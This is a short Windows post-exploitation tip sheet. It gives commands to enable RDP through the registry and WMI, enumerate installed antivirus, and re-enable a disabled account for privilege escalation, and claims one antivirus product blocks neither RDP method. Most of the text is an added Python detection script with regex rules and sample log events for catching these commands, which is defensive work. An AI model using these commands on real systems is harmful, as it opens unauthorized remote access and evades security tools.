Two ways to enable 3389 (RDP); a certain "60" product blocks neither of them
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
Get details of the installed antivirus product
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
You can also enable the guest account and escalate privileges after logging in.
wmic useraccount where "name='demo'" set disabled=false
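From the defending side, each command above leaves a recognizable process command line, including the `Terminal" "Server` quoting, which cmd.exe collapses into a single argument. The following is an added example, not part of the original page: it matches these command lines in process-creation logs after normalizing quotes. The rule labels, the sample events and the host name WS01 are constructed assumptions.

```python
import re

# Detection rules, applied to a normalized (lower-cased, unquoted) command line.
RULES = {
    "rdp_enabled_via_registry": re.compile(
        r"\breg(\.exe)?\s+add\b.*control\\terminal\s*server\b"
        r".*fdenytsconnections.*/d\s+(0x)?0+\b"),
    "rdp_enabled_via_wmi": re.compile(
        r"\bwmic(\.exe)?\b.*\brdtoggle\b.*setallowtsconnections\s+1\b"),
    "av_product_enumeration": re.compile(
        r"\bwmic(\.exe)?\b.*securitycenter2?\b.*antivirusproduct"),
    "local_account_state_changed": re.compile(
        r"\bwmic(\.exe)?\b.*\buseraccount\b.*\bset\b.*disabled\s*=\s*(true|false)"),
}

def normalize(cmdline):
    """Lower-case, drop quotes and carets that cmd.exe consumes, collapse spaces."""
    s = re.sub(r"[\"'\u2018\u2019\u201c\u201d^]", "", cmdline.lower())
    return re.sub(r"\s+", " ", s).strip()

def detect(cmdline):
    """Return the sorted labels of every rule the command line triggers."""
    norm = normalize(cmdline)
    return sorted(label for label, rx in RULES.items() if rx.search(norm))

def scan(events):
    """Return (index, labels) for each event with at least one hit."""
    return [(i, hits) for i, e in enumerate(events) if (hits := detect(e))]

# Constructed command lines, as they would appear in Sysmon Event ID 1
# or Security Event ID 4688 (with command-line auditing enabled).
SAMPLE_EVENTS = [
    r'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server'
    r' /v fDenyTSConnections /t REG_DWORD /d 00000000 /f',
    r"wmic RDTOGGLE WHERE ServerName='WS01' call SetAllowTSConnections 1",
    r"wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName",
    "wmic useraccount where name=\u2019demo\u2019 set disabled=false",
    # Benign: re-disabling RDP and an unrelated wmic query must not alert.
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"'
    r' /v fDenyTSConnections /t REG_DWORD /d 1 /f',
    r"wmic os get caption",
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(i, hits, SAMPLE_EVENTS[i])
```

Command-line rules only see changes made through reg.exe or wmic.exe; monitoring the fDenyTSConnections value itself (registry auditing or Sysmon Event ID 13) covers other ways of writing it.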